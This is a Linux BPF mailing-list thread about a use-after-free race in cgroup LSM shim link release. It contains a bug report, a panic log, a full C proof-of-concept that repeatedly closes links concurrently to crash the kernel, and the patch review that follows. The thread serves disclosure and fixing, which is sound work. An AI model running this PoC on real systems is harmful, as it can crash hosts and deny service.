bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

33 views
Skip to first unread message

梅开彦

unread,
Nov 25, 2025, 6:14:42 AM11/25/25
to b...@vger.kernel.org, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org
Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.

Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Vulnerability Description

The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

## Root Cause

1. **Shared `shim_link`**: When BPF LSM programs are attached to a cgroup for a specific LSM hook, the kernel may create a single, shared `bpf_shim_tramp_link` (herein `shim_link`) for that hook. This `shim_link` is reference-counted. If multiple `bpf_cgroup_link`s are created for this same hook (e.g., by attaching the same program to different cgroups), they all share and hold a reference to this `shim_link`.

2. **Concurrent Release**: When these `bpf_cgroup_link`s are released concurrently (e.g., by `close()`-ing their file descriptors from multiple threads), the release handler for each link, `bpf_cgroup_link_release`, is invoked. This in turn calls `bpf_trampoline_unlink_cgroup_shim`.

3. **Race Condition**: The `bpf_trampoline_unlink_cgroup_shim` function looks up the shared `shim_link` and calls `bpf_link_put()` on it. The problem is that this function lacks proper locking to serialize the find-and-put operation on the shared `shim_link`.

4. **State Corruption**: `bpf_link_put()` is not designed to be called concurrently on the same link instance when its reference count is about to drop to zero. The race allows two threads to enter a critical section where both might evaluate the reference count and one proceeds to call `INIT_WORK()` on the link's `work_struct` while it's already been scheduled by the other thread, leading to the `ODEBUG bug in __init_work` warning and subsequent panic. This indicates a corruption of the internal state of the `shim_link` object.

## Reproduction Steps

The vulnerability is reproduced by the PoC we provide below. Its logic is as follows:

1. **Load Program**: A minimal BPF LSM program is loaded into the kernel.
2. **Create Shared State**: The PoC attaches this single BPF program to **two different** cgroups. This creates two independent `bpf_cgroup_link`s (and their file descriptors), but crucially, they both share a single underlying `shim_link` object, whose reference count becomes 2.
3. **Trigger Race**: The PoC creates two threads. Each thread is passed one of the two link file descriptors. The threads then attempt to `close()` the descriptors concurrently.
4. **Amplify Probability**: To ensure the small race window is hit, the attach-and-concurrently-close process is repeated in a tight loop (`NUM_ITERATIONS` times).

This repeated, concurrent invocation of the release path reliably triggers the race condition in `bpf_trampoline_unlink_cgroup_shim`.

## Crash Report

```
.------------[ cut here ]------------
[ 79.070173][ T9925] ------------[ cut here ]------------
[ 79.070435][ T9925] ODEBUG: init active (active state 0) object: ffff888029de8d28 object type: work_struct hint: bpf_link0
[ 79.071026][ T9925] WARNING: lib/debugobjects.c:612 at debug_print_object+0x1a2/0x2b0, CPU#0: poc/9925
[ 79.071410][ T9925] Modules linked in:
[ 79.071587][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.071995][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.072360][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.072599][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.073371][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.073620][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.073949][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.074269][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.074588][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.074906][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.075226][ T9925] FS: 00007f2e4303b6c0(0000) GS:ffff8880cda4e000(0000) knlGS:0000000000000000
[ 79.075586][ T9925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 79.075853][ T9925] CR2: 00007f2e42839f78 CR3: 000000010f55c000 CR4: 0000000000752ef0
[ 79.076177][ T9925] PKRU: 55555554
[ 79.076324][ T9925] Call Trace:
[ 79.076460][ T9925] <TASK>
[ 79.076581][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.076823][ T9925] __debug_object_init+0x229/0x390
[ 79.077312][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.077551][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.077787][ T9925] __init_work+0x51/0x60
[ 79.077967][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.078211][ T9925] bpf_link_put+0x54/0x180
[ 79.078395][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.078660][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.078926][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.079204][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.079467][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.079710][ T9925] ? find_held_lock+0x2b/0x80
[ 79.079907][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.080131][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.080371][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.080587][ T9925] bpf_link_free+0xf0/0x390
[ 79.080775][ T9925] bpf_link_release+0x61/0x80
[ 79.080972][ T9925] __fput+0x407/0xb50
[ 79.081142][ T9925] fput_close_sync+0x114/0x210
[ 79.081340][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.081555][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.081754][ T9925] __x64_sys_close+0x93/0x120
[ 79.081953][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.082144][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.082386][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.082568][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.083335][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.083672][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.083990][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.084309][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.084626][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.084943][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.085269][ T9925] </TASK>
[ 79.085395][ T9925] Kernel panic - not syncing: kernel: panic_on_warn set ...
[ 79.085685][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.086084][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.086446][ T9925] Call Trace:
[ 79.086581][ T9925] <TASK>
[ 79.086702][ T9925] dump_stack_lvl+0x3d/0x1b0
[ 79.086892][ T9925] vpanic+0x67e/0x710
[ 79.087060][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.087273][ T9925] panic+0xc7/0xd0
[ 79.087428][ T9925] ? __pfx_panic+0x10/0x10
[ 79.087616][ T9925] ? check_panic_on_warn+0x24/0xc0
[ 79.087827][ T9925] check_panic_on_warn+0xb6/0xc0
[ 79.088036][ T9925] __warn+0x10d/0x3f0
[ 79.088201][ T9925] ? __wake_up_klogd.part.0+0x9e/0x100
[ 79.088426][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.088642][ T9925] report_bug+0x2e1/0x500
[ 79.088822][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.089040][ T9925] handle_bug+0x2dd/0x410
[ 79.089222][ T9925] exc_invalid_op+0x35/0x80
[ 79.089412][ T9925] asm_exc_invalid_op+0x1a/0x20
[ 79.089614][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.089854][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.090618][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.090865][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.091183][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.091500][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.091818][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.092137][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.092455][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.092695][ T9925] ? __warn_printk+0x17e/0x310
[ 79.092892][ T9925] ? __warn_printk+0x18b/0x310
[ 79.093092][ T9925] ? debug_print_object+0x1a1/0x2b0
[ 79.093307][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.093549][ T9925] __debug_object_init+0x229/0x390
[ 79.093762][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.094001][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.094235][ T9925] __init_work+0x51/0x60
[ 79.094410][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.094653][ T9925] bpf_link_put+0x54/0x180
[ 79.094837][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095100][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.095358][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.095636][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095897][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.096144][ T9925] ? find_held_lock+0x2b/0x80
[ 79.096340][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.096562][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.096816][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.097035][ T9925] bpf_link_free+0xf0/0x390
[ 79.097224][ T9925] bpf_link_release+0x61/0x80
[ 79.097420][ T9925] __fput+0x407/0xb50
[ 79.097590][ T9925] fput_close_sync+0x114/0x210
[ 79.097787][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.098007][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.098207][ T9925] __x64_sys_close+0x93/0x120
[ 79.098404][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.098593][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.098834][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.099016][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.099781][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.100120][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.100440][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.100757][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.101077][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.101394][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.101719][ T9925] </TASK>
[ 79.102160][ T9925] Kernel Offset: disabled
```

## Proof of Concept

The following C program can demonstrate the vulnerability on linux-next-20251111(commit 2666975a8905776d306bee01c5d98a0395bda1c9).

To successfully run the PoC, you need to obtain the BTF ID for `bpf_lsm_socket_create` and set the definition `ATTACH_BTF_ID_socket_create` to this value. You can retrieve this BTF ID using the following command: `bpftool btf dump file path-to-your-vmlinux | grep bpf_lsm_socket_create`.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <sys/resource.h>
#include <pthread.h>

#define CGROUP1_PATH "/tmp/cgroup_poc_1"
#define CGROUP2_PATH "/tmp/cgroup_poc_2"
#define LOG_BUF_SIZE 65536
#define NUM_ITERATIONS 1000 // Increased loop count to improve hit probability

// ============================================================================
// Important: This BTF ID is kernel version specific.
// You must find the correct ID for your kernel and update the value below.
// ============================================================================
#define ATTACH_BTF_ID_socket_create 198174

// Wrapper for bpf() system call
static long bpf(int cmd, union bpf_attr *attr, unsigned int size) {
return syscall(__NR_bpf, cmd, attr, size);
}

// Simple BPF program: int func() { return 0; }
struct bpf_insn bpf_prog_insns[] = {
{ .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
{ .code = BPF_JMP | BPF_EXIT },
};

// Helper function to create cgroup v2 directory
static int setup_cgroup(const char *path) {
if (mkdir(path, 0755) && errno != EEXIST) {
perror("mkdir cgroup path");
return -1;
}
if (mount("none", path, "cgroup2", 0, NULL)) {
if (errno != EBUSY && errno != EINVAL) {
fprintf(stderr, "Warning: could not mount cgroup2 at %s: %s\n",
path, strerror(errno));
}
}
return open(path, O_RDONLY | O_DIRECTORY);
}

// Thread worker function to close file descriptor
void *close_worker(void *arg) {
long fd = (long)arg;
if (close(fd) != 0) {
// Under high concurrency, this may fail due to race conditions, which can be ignored
}
return NULL;
}

int main(void) {
union bpf_attr prog_attr = {}, link_attr = {};
int cgroup_fd1, cgroup_fd2, prog_fd;
char bpf_log_buf[LOG_BUF_SIZE] = {0};

struct rlimit rlim = {RLIM_INFINITY, RLIM_INFINITY};
if (setrlimit(RLIMIT_MEMLOCK, &rlim)) {
perror("setrlimit(RLIMIT_MEMLOCK)");
return 1;
}

printf("Setting up cgroups...\n");
cgroup_fd1 = setup_cgroup(CGROUP1_PATH);
if (cgroup_fd1 < 0) return 1;
cgroup_fd2 = setup_cgroup(CGROUP2_PATH);
if (cgroup_fd2 < 0) return 1;

// 1. Load BPF program (only needs to be loaded once)
prog_attr.prog_type = BPF_PROG_TYPE_LSM;
prog_attr.expected_attach_type = BPF_LSM_CGROUP;
prog_attr.insn_cnt = sizeof(bpf_prog_insns) / sizeof(struct bpf_insn);
prog_attr.insns = (uint64_t)bpf_prog_insns;
prog_attr.license = (uint64_t)"GPL";
prog_attr.attach_btf_id = ATTACH_BTF_ID_socket_create;
prog_attr.log_buf = (uint64_t)bpf_log_buf;
prog_attr.log_size = LOG_BUF_SIZE;
prog_attr.log_level = 1;

printf("Loading BPF program...\n");
prog_fd = bpf(BPF_PROG_LOAD, &prog_attr, sizeof(prog_attr));
if (prog_fd < 0) {
fprintf(stderr, "Error: BPF_PROG_LOAD failed: %s\n", strerror(errno));
fprintf(stderr, "------ Verifier Log ------\n%s\n------------------------\n", bpf_log_buf);
goto cleanup_cgroups;
}

printf("Starting %d iterations to trigger the race condition...\n", NUM_ITERATIONS);
for (int i = 0; i < NUM_ITERATIONS; i++) {
if (i % 100 == 0) printf("Iteration %d...\n", i);

link_attr.link_create.prog_fd = prog_fd;
link_attr.link_create.attach_type = BPF_LSM_CGROUP;

// 2. Repeatedly attach program to two cgroups in loop
link_attr.link_create.target_fd = cgroup_fd1;
int link_fd1 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
if (link_fd1 < 0) {
perror("BPF_LINK_CREATE for cgroup 1 failed");
continue; // Continue to next iteration
}

link_attr.link_create.target_fd = cgroup_fd2;
int link_fd2 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
if (link_fd2 < 0) {
perror("BPF_LINK_CREATE for cgroup 2 failed");
close(link_fd1);
continue; // Continue to next iteration
}

// 3. Concurrent close of two links to attempt triggering race condition
pthread_t th1, th2;
pthread_create(&th1, NULL, close_worker, (void *)(long)link_fd1);
pthread_create(&th2, NULL, close_worker, (void *)(long)link_fd2);

pthread_join(th1, NULL);
pthread_join(th2, NULL);
}


printf("\nPoC finished. Please check kernel logs (`dmesg`).\n");

close(prog_fd);
close(cgroup_fd1);
close(cgroup_fd2);
return 0;

cleanup_cgroups:
close(cgroup_fd1);
close(cgroup_fd2);
return 1;
}
```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.

config-20251111

Martin KaFai Lau

unread,
Dec 1, 2025, 3:22:32 PM12/1/25
to 梅开彦, Stanislav Fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org
On 11/25/25 3:14 AM, 梅开彦 wrote:
> Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.
>
> Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
> Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
>
> ## Vulnerability Description
>
> The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

I don't think concurrent bpf_link_put(same_link) is the issue.
bpf_link_put uses an atomic link->refcnt to handle this situation.

The race should be between the bpf_link_put() in
bpf_trampoline_unlink_cgroup_shim() and the cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim(). The cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim() gets a shim_link with a refcnt 0, then
a UAF.

The changes in commit ab5d47bd41b1 ("bpf: Remove in_atomic() from
bpf_link_put().") made this bug easier to manifest as in the reproducer
because the bpf_trampoline_unlink_prog() is always delayed.

A potential fix is to check the link->refcnt in
bpf_trampoline_unlink_cgroup_shim() and call
bpf_trampoline_unlink_prog() when needed inside the
mutex_lock(&tr->mutex). Cc: Stanislav

梅开彦

unread,
Dec 1, 2025, 11:49:28 PM12/1/25
to martin kafai lau, stanislav fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org


> -----原始邮件-----
> 发件人: "Martin KaFai Lau" <marti...@linux.dev>
> 发送时间: 2025-12-02 04:21:57 (星期二)
> 收件人: "梅开彦" <kai...@hust.edu.cn>, "Stanislav Fomichev" <s...@fomichev.me>
> 抄送: dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org
> 主题: Re: bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

Thank you for the correction and analysis。
This is super helpful for our subsequent work!

xulang

unread,
Feb 6, 2026, 2:14:33 AMFeb 6
to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xulang
Based on Martin KaFai Lau's suggestions, I have created a simple patch.

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

To fix this:
1. Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
Only increment the refcount if it is not already zero.
2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
while the mutex is held.

Testing:
I used a non-rigorous method to verify the fix by adding a delay in
`bpf_link_put` to make the bug easier to trigger:

void bpf_link_put(struct bpf_link *link)
{
if (!atomic64_dec_and_test(&link->refcnt))
return;
+ msleep(100);
INIT_WORK(&link->work, bpf_link_put_deferred);
schedule_work(&link->work);
}

Before the patch, running a PoC easily reproduced the crash (often within
dozens of iterations) with a call trace similar to KaiyanM's report.
After the patch, the bug no longer occurs even after millions of
iterations.

Signed-off-by: xulang <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++++----
1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..c16a53cca5e0 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -702,15 +702,23 @@ static void bpf_shim_tramp_link_release(struct bpf_link *link)
return;

WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link, shim_link->trampoline, NULL));
- bpf_trampoline_put(shim_link->trampoline);
}

static void bpf_shim_tramp_link_dealloc(struct bpf_link *link)
{
struct bpf_shim_tramp_link *shim_link =
container_of(link, struct bpf_shim_tramp_link, link.link);
+ struct bpf_trampoline *tr = shim_link->trampoline;

+ if (!tr) {
+ kfree(shim_link);
+ return;
+ }
+
+ mutex_lock(&tr->mutex);
kfree(shim_link);
+ mutex_unlock(&tr->mutex);
+ bpf_trampoline_put(tr);
}

static const struct bpf_link_ops bpf_shim_tramp_link_lops = {
@@ -800,10 +808,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
mutex_lock(&tr->mutex);

shim_link = cgroup_shim_find(tr, bpf_func);
- if (shim_link) {
+ if (shim_link && atomic64_inc_not_zero(&shim_link->link.link.refcnt)) {
/* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
mutex_unlock(&tr->mutex);
bpf_trampoline_put(tr); /* bpf_trampoline_get above */
return 0;
--
2.50.1

bot+b...@kernel.org

unread,
Feb 6, 2026, 2:50:48 AMFeb 6
to xul...@uniontech.com, marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev

commit 55b1614b50eb05449d35281100cacc591d1aca3a
Author: xulang <xul...@uniontech.com>

bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim

This commit fixes a use-after-free race in the BPF cgroup shim handling.
When bpf_link_put() reduces the refcount to zero but before the deferred
cleanup runs, another thread can find the shim via cgroup_shim_find() and
attempt to increment its refcount. The fix uses atomic64_inc_not_zero()
to detect and handle this race.

This commit appears to fix a bug introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call that
could resurrect a zero-refcount link. Should this patch include a Fixes:
tag?

Suggested:
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")


---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/21742563414

AI-authorship-score: medium
AI-authorship-explanation: The commit message uses markdown-style formatting (backticks) and has a structured, verbose explanatory style that is atypical of kernel patches, though the technical content is sound.
issues-found: 1
issue-severity-score: low
issue-severity-explanation: Missing Fixes: tag for a major bug fix; the fix itself is technically correct.

Martin KaFai Lau

unread,
Feb 12, 2026, 2:51:35 PMFeb 12
to xulang, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me


On 2/5/26 11:13 PM, xulang wrote:
> Based on Martin KaFai Lau's suggestions, I have created a simple patch.

Thanks for the patch.

>
> The root cause of this bug is that when `bpf_link_put` reduces the
> refcount of `shim_link->link.link` to zero, the resource is considered
> released but may still be referenced via `tr->progs_hlist` in
> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
> `bpf_shim_tramp_link_release` is deferred. During this window, another
> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>
> To fix this:
> 1. Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
> Only increment the refcount if it is not already zero.

This makes sense.

> 2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
> while the mutex is held.

I am not sure about this one (details below).

>
> Testing:
> I used a non-rigorous method to verify the fix by adding a delay in
> `bpf_link_put` to make the bug easier to trigger:
>
> void bpf_link_put(struct bpf_link *link)
> {
> if (!atomic64_dec_and_test(&link->refcnt))
> return;
> + msleep(100);
> INIT_WORK(&link->work, bpf_link_put_deferred);
> schedule_work(&link->work);
> }
>
> Before the patch, running a PoC easily reproduced the crash (often within
> dozens of iterations) with a call trace similar to KaiyanM's report.
> After the patch, the bug no longer occurs even after millions of
> iterations.
>
> Signed-off-by: xulang <xul...@uniontech.com>
> ---
> kernel/bpf/trampoline.c | 14 ++++++++++----
> 1 file changed, 10 insertions(+), 4 deletions(-)
>
> diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
> index 976d89011b15..c16a53cca5e0 100644
> --- a/kernel/bpf/trampoline.c
> +++ b/kernel/bpf/trampoline.c
> @@ -702,15 +702,23 @@ static void bpf_shim_tramp_link_release(struct bpf_link *link)
> return;
>
> WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link, shim_link->trampoline, NULL));

bpf_trampoline_unlink_prog() will hold (/wait) for tr->mutex before
unlinking from tr. The link's refcnt is already 0 here.


> - bpf_trampoline_put(shim_link->trampoline);
> }
>
> static void bpf_shim_tramp_link_dealloc(struct bpf_link *link)
> {
> struct bpf_shim_tramp_link *shim_link =
> container_of(link, struct bpf_shim_tramp_link, link.link);
> + struct bpf_trampoline *tr = shim_link->trampoline;
>
> + if (!tr) {
> + kfree(shim_link);
> + return;
> + }
> +
> + mutex_lock(&tr->mutex);

The link_release is done before the link_dealloc. Why it needs to hold
(/wait) for the tr->mutex again?

> kfree(shim_link);
> + mutex_unlock(&tr->mutex);
> + bpf_trampoline_put(tr);
> }
>
> static const struct bpf_link_ops bpf_shim_tramp_link_lops = {
> @@ -800,10 +808,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
> mutex_lock(&tr->mutex);
>
> shim_link = cgroup_shim_find(tr, bpf_func);
> - if (shim_link) {
> + if (shim_link && atomic64_inc_not_zero(&shim_link->link.link.refcnt)) {

Use bpf_link_inc_not_zero().

pw-bot: cr

xulang

unread,
Feb 24, 2026, 4:43:00 AMFeb 24
to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com
> I am not sure about this one (details below).
>
>> 2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
>> while the mutex is held.
>
> The link_release is done before the link_dealloc. Why it needs to hold
> (/wait) for the tr->mutex again?

Yes, I realized that later. There is no need to guard the freeing of `shim_link`.
I mistakenly thought that `shim_link` might get freed by dealloc between
the mutex lock in bpf_trampoline_link_cgroup_shim.

xulang

unread,
Feb 25, 2026, 1:56:05 AMFeb 25
to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com
Based on Martin KaFai Lau's suggestions, I have created a simple patch.

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

To fix this:
Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
Only increment the refcount if it is not already zero.

Optimized testing:
I used a non-rigorous method to verify the fix by adding a delay in
`bpf_shim_tramp_link_release` to make the bug easier to trigger:

static void bpf_shim_tramp_link_release(struct bpf_link *link)
{
...
if (!shim_link->trampoline)
return;

